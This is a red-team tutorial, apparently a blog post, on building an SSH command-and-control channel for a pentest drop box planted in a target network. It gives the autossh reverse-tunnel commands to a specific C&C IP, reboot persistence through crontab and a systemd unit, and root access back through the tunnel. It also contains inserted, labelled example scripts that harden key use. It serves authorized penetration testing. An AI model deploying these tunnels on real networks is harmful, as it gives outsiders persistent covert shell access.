

SSH as C&C

While Nebula might provide a simpler, faster Command and Control (C&C) scheme than SSH, it may not work in all environments. Therefore, as a back-up method, I’ve decided to include instructions for creating a more traditional, SSH-based C&C method.

There are a few drawbacks to the SSH model:

  • It puts the C&C at risk if a drop box gets compromised: every box carries a key that logs into the C&C.
  • With multiple pentesters and multiple drop-boxes, this method becomes overly complex.
  • All connections depend upon the C&C; if it goes down, all connections are lost.
  • Routing all traffic through the C&C increases latency as well as operational costs.

However, there is one big advantage:

  • Many corporate networks allow outbound TCP connections on common ports (e.g. SSH, HTTP, HTTPS).

Since the C&C's SSH daemon can be configured to listen on any TCP port, getting out through the target's egress firewall is a less daunting task. While the SSH method has its flaws, it is more likely to succeed in networks where Nebula isn't an option.


Setting Up the SSH C&C

To start with, we’ll need a C&C cloud server. Here are a few possibilities to consider:

For the sake of simplicity, I did none of these things. I hosted the SSH C&C on the same system as the Nebula C&C and left the SSH daemon listening on the default port, 22.

To begin, let’s log into the drop box:

haxys@straylight:~$ ssh root@192.168.1.2
root@192.168.1.2's password:
Linux kali 4.19.81-Re4son-v7+ #1 SMP Wed Nov 6 10:16:47 AEDT 2019 armv7l

Red-Team Drop Box: BOX-001
Property of Pentest Company Incorporated
Last login: Sat Dec  7 18:23:17 2019 from 10.42.42.100
root@kali:~#

Next, we’ll need to install autossh:

apt install autossh

Generate a new SSH key (with an empty passphrase, since autossh has to use it unattended) for the C&C server. In my case I'm using Google Cloud, so I'll be following their instructions for creating a new SSH key for their particular service. I make sure to leave the passphrase empty:

root@kali:~# ssh-keygen -t rsa -f ~/.ssh/cnc -C "cnc-service"
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/cnc.
Your public key has been saved in /root/.ssh/cnc.pub.
The key fingerprint is:
SHA256:QPDJm+UFprjEotGuKDWPAPLn3CnaFv2zi74JTpKEH80 cnc-service
The key's randomart image is:
+---[RSA 3072]----+
|    ... o        |
| . . = + .       |
|+ o + * . .      |
|o* = . * .       |
|+ B E.o S        |
|.* X....         |
|+ = B.o.         |
|.  *.o oo        |
|  ..o.=.o+       |
+----[SHA256]-----+

Next, I cat the contents of the cnc.pub file:

root@kali:~# cat ~/.ssh/cnc.pub
ssh-rsa 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 cnc-service

Finally, I copy and paste the contents of the file into my Google Cloud SSH key metadata section:

CNC SSH Key

With this in place, I attempt to log into the SSH service from the drop box:

root@kali:~# ssh -i ~/.ssh/cnc cnc-service@104.154.194.215
The authenticity of host '104.154.194.215 (104.154.194.215)' can't be established.
ECDSA key fingerprint is SHA256:VlYHr38zi4yJXn/rWZzeOE/Nm4XRF6pR4GaKvQTjB5s.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '104.154.194.215' (ECDSA) to the list of known hosts.
Linux nebula-master 4.19.0-6-cloud-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cnc-service@nebula-master:~$

Success! Now let's test autossh. We want the following arrangement:

  1. autossh will connect to the C&C using key-based authentication.
  2. It will hold a reverse forward open: port 6667 on the C&C's loopback interface leads back to port 22 on the drop box. (Port 6667 is reachable only from the C&C itself, not from the internet.)

Let’s test this arrangement:

autossh -o "PubkeyAuthentication=yes" -o "PasswordAuthentication=no" -i /root/.ssh/cnc -R 6667:127.0.0.1:22 cnc-service@104.154.194.215 -N

This will open a non-interactive session. To test the link from the pentester’s laptop, first create an SSH connection to your C&C, with port forwarding connecting your local port 6667 to port 6667 on the C&C server:

ssh cnc-service@104.154.194.215 -i ~/.ssh/cnc -L 6667:localhost:6667 -N

Next, from the same laptop, open another shell and SSH into root@localhost on port 6667, using the root password from the drop box:

haxys@freeside:~$ ssh root@localhost -p 6667
The authenticity of host '[localhost]:6667 ([127.0.0.1]:6667)' can't be established.
ECDSA key fingerprint is SHA256:V0zr5abt6HcXUD4YKkz0HqivdMwy8Eg0E0xhqTjq3FE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
  ...
Red-Team Drop Box: BOX-001
Property of Pentest Company Incorporated
Last login: Sun Dec  8 00:27:49 2019 from 192.168.1.123
root@kali:~#

Wonderful! We can close all of those SSH sessions now; our next move is to configure the drop box to establish the SSH connection automatically at boot. Back on the drop box, append an @reboot entry to /etc/crontab (we are already root, so no sudo is needed; "sudo echo ... >> file" would not have elevated the redirect anyway):

echo "@reboot root AUTOSSH_GATETIME=0 autossh -o \"PubkeyAuthentication=yes\" -o \"PasswordAuthentication=no\" -i /root/.ssh/cnc -R 127.0.0.1:6667:127.0.0.1:22 cnc-service@104.154.194.215 -f -N" >> /etc/crontab

Three details matter here. The listener is bound to 127.0.0.1 on the C&C, matching the arrangement above; with sshd's default GatewayPorts no the server binds to loopback whatever address the client asks for, but asking for 0.0.0.0 states the wrong intent and would expose the drop box's sshd to the internet on any C&C where GatewayPorts has been enabled. AUTOSSH_GATETIME=0 stops autossh from giving up when the first attempt fails because the network isn't up yet at the moment cron fires @reboot (by default it quits for good if the first connection fails within 30 seconds). And -f already puts autossh into the background, so no trailing & is needed.
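The crontab entry works, but on a systemd-based drop box (Kali on the Raspberry Pi is one) a unit file is the more robust home for the tunnel: it waits for the network, restarts autossh if autossh itself dies, and keeps all the options in one readable place. The installer below is an added example, not code from the original post. It assumes the C&C address, account and key path used above; the unit name cnc-tunnel and the installer's interface are this example's own choices.

```shell
#!/bin/sh
# Added example (not from the original post): run the reverse tunnel as a
# systemd service instead of an @reboot crontab entry.
# Assumed: C&C address, account and key path as used in the post; the unit
# name "cnc-tunnel" and the installer interface are this example's own.
CNC_HOST="104.154.194.215"
CNC_USER="cnc-service"
CNC_KEY="/root/.ssh/cnc"
REMOTE_PORT="6667"   # loopback port on the C&C that leads back to the box's sshd

# Print the unit file. Everything is parameterised through the variables above.
cnc_tunnel_unit() {
    cat <<EOF
[Unit]
Description=Reverse SSH tunnel to the C&C
# Do not start until the uplink is up; autossh would otherwise burn its
# first attempts on a network that is not there yet.
Wants=network-online.target
After=network-online.target

[Service]
# AUTOSSH_GATETIME=0: by default autossh gives up for good if the first
# connection fails within 30 s, which is exactly what happens at boot.
Environment=AUTOSSH_GATETIME=0
# -M 0 turns off autossh's own echo-port monitor; the ServerAlive options
# make ssh itself notice a dead link and exit, after which autossh reconnects.
# ExitOnForwardFailure makes a tunnel whose port is still held by a stale
# session on the C&C fail fast instead of sitting there without a forward.
ExecStart=/usr/bin/autossh -M 0 -N \\
    -o PubkeyAuthentication=yes -o PasswordAuthentication=no \\
    -o ServerAliveInterval=30 -o ServerAliveCountMax=3 \\
    -o ExitOnForwardFailure=yes \\
    -i ${CNC_KEY} \\
    -R 127.0.0.1:${REMOTE_PORT}:127.0.0.1:22 ${CNC_USER}@${CNC_HOST}
Restart=always
RestartSec=15

[Install]
WantedBy=multi-user.target
EOF
}

# Write the unit into a directory (default /etc/systemd/system) and print its path.
install_cnc_tunnel_unit() {
    dir="${1:-/etc/systemd/system}"
    unit="$dir/cnc-tunnel.service"
    cnc_tunnel_unit > "$unit" && chmod 644 "$unit" && printf '%s\n' "$unit"
}

# As root on the drop box:  sh cnc-tunnel.sh install
if [ "${1:-}" = "install" ]; then
    install_cnc_tunnel_unit >/dev/null \
        && systemctl daemon-reload \
        && systemctl enable --now cnc-tunnel.service
fi
```

After "sh cnc-tunnel.sh install", "systemctl status cnc-tunnel" and "journalctl -u cnc-tunnel" show the reconnect history, which is also where a stale remote listener on the C&C (the ExitOnForwardFailure case) becomes visible. The reboot test that follows applies unchanged.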

Now, when you reboot the system, autossh should automatically establish an SSH connection to the C&C and enable port forwarding. To test this, reboot the drop box:

shutdown -r now

Once the system comes back online, switch to your pentester laptop. Once again, use SSH to connect to the C&C system, forwarding port 6667:

ssh cnc-service@104.154.194.215 -i ~/.ssh/cnc -L 6667:localhost:6667 -N

Note: I copied the cnc-service keys from the drop box to the laptop, for the sake of simplicity. In your case, you might want to generate new keys for each system connecting to the C&C.

In another shell, use SSH to login as root through the forwarded port:

haxys@freeside:~$ ssh root@localhost -p 6667
root@localhost's password:
Linux kali 4.19.81-Re4son-v7+ #1 SMP Wed Nov 6 10:16:47 AEDT 2019 armv7l

Red-Team Drop Box: BOX-001
Property of Pentest Company Incorporated
Last login: Sun Dec  8 01:32:44 2019 from 127.0.0.1
root@kali:~#

Success! Once the drop box is planted in the target network, you'll follow the same two steps to connect:

  1. Create an SSH connection to the C&C, forwarding local port 6667 to port 6667 on the C&C.
  2. Connect via SSH to root@localhost on port 6667.

In this way there are three SSH connections in play: the drop box's reverse tunnel to the C&C, your forward tunnel to the C&C, and a third SSH session to the drop box's sshd carried inside the other two. The first two hops only get you as far as the drop box's sshd; the root password still protects the box itself. One thing to watch: the drop box's host key is recorded in your known_hosts under [localhost]:6667, so if a different box ever ends up behind that port you'll get a host-key mismatch warning, which in this setup is a signal to stop and check rather than something to click through.
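Two of the drawbacks listed at the top of this section can be taken out of the design rather than lived with: the cnc key on a drop box should not be a general login on the C&C, and several boxes on one C&C need a naming and port convention. The script below is an added example, not code from the original post. Its assumptions are mine: one loopback port per box, 6600 plus the box number (BOX-001 on 6601, and so on, instead of the single port 6667 used above); a separate key per box; a hypothetical operator key ~/.ssh/cnc-operator on the laptop instead of the reused drop-box key; and a "Host cnc" stanza in the operator's ~/.ssh/config, which the script also generates. The authorized_keys options it emits (restrict, port-forwarding, permitlisten, permitopen, command) are standard sshd options; permitlisten needs OpenSSH 7.8 or later, which the Debian 10 C&C above has.

```shell
#!/bin/sh
# Added example, not code from the original post. Registers one drop box on
# the C&C and on the operator's laptop. Assumptions (mine, not the post's):
# one loopback port per box, 6600 + box number (BOX-001 -> 6601); a key per
# box; an operator key ~/.ssh/cnc-operator; a "Host cnc" stanza generated below.
CNC_HOST="104.154.194.215"
CNC_USER="cnc-service"

# BOX-001 -> 6601, BOX-042 -> 6642. Rejects anything that is not BOX-NNN.
box_port() {
    case "$1" in
        BOX-[0-9][0-9][0-9]) ;;
        *) printf 'box_port: bad box name: %s\n' "$1" >&2; return 1 ;;
    esac
    n=$(printf '%s' "${1##*-}" | sed 's/^0*//')   # strip leading zeros: 001 -> 1
    echo $((6600 + ${n:-0}))
}

# authorized_keys line for a box's key on the cnc-service account of the C&C.
#   restrict         no pty, no agent/X11 forwarding, no forwarding at all ...
#   port-forwarding  ... except what the next two options allow:
#   permitlisten     -R may only bind the box's own loopback port
#   permitopen       -L cannot be switched off on its own, so pin it to a
#                    loopback port nothing listens on; otherwise a compromised
#                    box could pivot through the C&C into its cloud network
#   command          a shell request (ssh without -N) just gets /bin/false
cnc_authorized_key() {   # args: box name, public key line ("ssh-rsa AAAA... comment")
    port=$(box_port "$1") || return 1
    printf 'restrict,port-forwarding,permitlisten="127.0.0.1:%s",permitopen="127.0.0.1:1",command="/bin/false" %s\n' \
        "$port" "$2"
}

# authorized_keys line for the operator's key: direct-tcpip to any loopback
# port on the C&C (what ProxyJump and -L use) and nothing else. C&C admin
# work goes through a different account and key.
operator_authorized_key() {   # arg: public key line
    printf 'restrict,port-forwarding,permitopen="127.0.0.1:*",command="/bin/false" %s\n' "$1"
}

# Operator-side ~/.ssh/config: the C&C itself, reached with the operator's own key.
cnc_ssh_config() {
    cat <<EOF
Host cnc
    HostName ${CNC_HOST}
    User ${CNC_USER}
    IdentityFile ~/.ssh/cnc-operator
EOF
}

# Operator-side stanza for one box: "ssh BOX-001" replaces the two manual
# steps (tunnel to the C&C, then ssh to localhost:PORT). ProxyJump opens the
# connection to 127.0.0.1:PORT from the C&C's point of view, i.e. into the
# reverse tunnel. HostKeyAlias pins the box's host key under its own name
# rather than under [localhost]:PORT, so a port reused by another box trips
# the known_hosts check instead of silently passing.
operator_ssh_config() {   # arg: box name
    port=$(box_port "$1") || return 1
    cat <<EOF
Host $1
    HostName 127.0.0.1
    Port ${port}
    User root
    ProxyJump cnc
    HostKeyAlias $1
EOF
}

# Usage: sh register-box.sh BOX-001 "$(cat box-001.pub)"
# -> authorized_keys line for the C&C, then the ssh_config stanza for the laptop.
if [ $# -eq 2 ]; then
    cnc_authorized_key "$1" "$2" && echo && operator_ssh_config "$1"
fi
```

On each box the autossh line then uses its own port, for example -R 127.0.0.1:6601:127.0.0.1:22 for BOX-001, and the operator types "ssh BOX-001". One caveat for Google Cloud specifically: when the guest agent manages authorized_keys from instance metadata it rewrites that file, so check that the options survive, or manage the cnc-service account's keys outside the metadata mechanism.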

